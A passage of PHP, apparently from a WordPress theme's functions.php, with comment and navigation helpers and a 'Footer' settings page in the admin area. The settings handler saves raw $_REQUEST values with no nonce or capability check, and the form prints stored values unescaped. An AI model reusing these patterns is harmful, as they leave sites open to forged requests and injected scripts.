		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
